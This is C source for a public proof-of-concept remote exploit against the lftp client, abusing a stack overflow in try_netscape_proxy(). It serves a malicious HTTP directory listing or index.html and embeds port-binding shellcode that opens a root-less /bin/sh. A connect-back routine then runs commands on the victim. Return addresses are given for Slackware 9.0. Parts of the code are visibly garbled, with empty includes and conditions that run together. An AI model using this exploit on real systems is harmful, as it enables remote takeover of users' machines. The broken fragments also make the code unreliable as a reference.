/*
* lftp remote stack-based overflow exploit by Li0n7 voila fr
*
* Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se
*
* Lftp versions later than 2.6.10 are prone to a remotly exploitable stack-based
* overflow in try_netscape_proxy() and try_squid_eplf( (src/HttpDir.cc). This
* bad coded proof-of-concept demonstrates the exploitation by exploiting the
* vulnerable function try_netscape_proxy() (HttpDir.cc:358) and it needs more targets
* to be efficient. Please note that this vulnerability is really hard to exploit
* since lots of parameters come into play and are different from a platform to another,
* for we have to overwrite some variables and registers before overwriting eip.
* With some time and lot of patience, you should find your own parameters by using
* GDB. Params to edit are marked with a '!' in the POC code. Moreover, I have edited
* Bighawk's port binding shellcode not to contain any white character such as \r,\t,\v,
* \f,\n or \20 because we are exploiting a sscanf function.
*
* usage: ./lftp-exp [-f ][-p ][-r ][-t ]
* -f : create index.html
* -p : run a fake lftp server on port (default: 80)
* -r : return address you would like to use
* -t : choose the target among the platforms available
* Platforms supported are:
* num: 0 - slack 9.0 - 0xbffff770
*
* For instance: ./lftp-exp -p 80 -t 0
* ./lftp-exp -f / -t 0
*
* A poil !
*/
#include
#include
#include
#include
#include
#include
#include
#define BUFFERSIZE 117 /*!*/
#define SIZE 256
#define D_BACK 26112
#define D_RET 0xbffff770
#define D_PORT 80
#define DUMMY1 0xbffff140 /*!*/
#define DUMMY2 0xbffff810 /*!*/
#define OK "cd ok, cwd=/\n"
/* Edited bighawk 78 bytes portbinding shellcode */
/* size: 80 bytes */
/* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */
char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x28\x2c\x1d\xcd\x80";
char badc0ded[] =
{0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00};
char *lftp_versions[] =
{
"lftp/2.3",
"lftp/2.4.9",
"lftp/2.5.2",
"lftp/2.6.0",
"lftp/2.6.3",
"lftp/2.6.4",
"lftp/2.6.5",
"lftp/2.6.6",
"lftp/2.6.7",
"lftp/2.6.8",
"lftp/2.6.9",
};
unsigned long ret_addr = D_RET;
int back_connection(long host);
int check_shellcode(char *host);
void check_version();
char * build(char *host);
int create_file(char *path);
void wait_connection(int port);
long resolve_host(u_char *host_name);
void die(char *argv);
struct os_ret_addr
{
int num;
char *plat;
long ret;
};
struct os_ret_addr exp_os[]=
{
{0,"slack 9.0",0xbffff770},
{0,NULL,0}
};
int
main(int argc,char *argv[])
{
int i, option, port = D_PORT;
long host = 0;
char * option_list = "f:p:r:t:", path[128];
opterr = 0;
if (argc 65535 || port 0xbfffffff || ret_addr i || atoi(optarg) empty Fri May 30 10:09:06 2001 %s\n",build("+"));
written = write(fd,buffer,512);
if(written != 512)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(0);
}
close(fd);
fprintf(stdout,"[+] File %s successfuly created.\n",file);
return 0;
}
int
back_connection(long host)
{
struct sockaddr_in s;
u_char sock_buf[4096];
fd_set fds;
int fd,size;
char *command="/bin/uname -a ; /usr/bin/id;\n";
fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd empty\tFri May 30 10:09:06 2001 %s\n",build((char*)inet_ntoa(s.sin_addr)));
size = send(fd2, request, strlen(request), 0);
if(size h_addr, host_ent->h_length);
}
return(addr.s_addr);
}
void
die(char *argv)
{
int i;
fprintf(stdout,"\t Remote exploit for lftp ][-p ][-r ][-t ]\n",argv);
fprintf(stdout," -f : create index.html\n");
fprintf(stdout," -p : run a fake lftp server on port (default: 80)\n");
fprintf(stdout," -r : return address you would like to use\n");
fprintf(stdout," -t : choose the target among the platforms available\n");
fprintf(stdout," Platforms supported are:\n");
for(i=0; exp_os[i].plat != NULL; i++)
fprintf(stderr," num: %i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
fprintf(stdout,"\n Vulnerability discovered by Ulf Harnhammar \n");
fprintf(stdout," Contact me: \n\n");
exit(1);
}
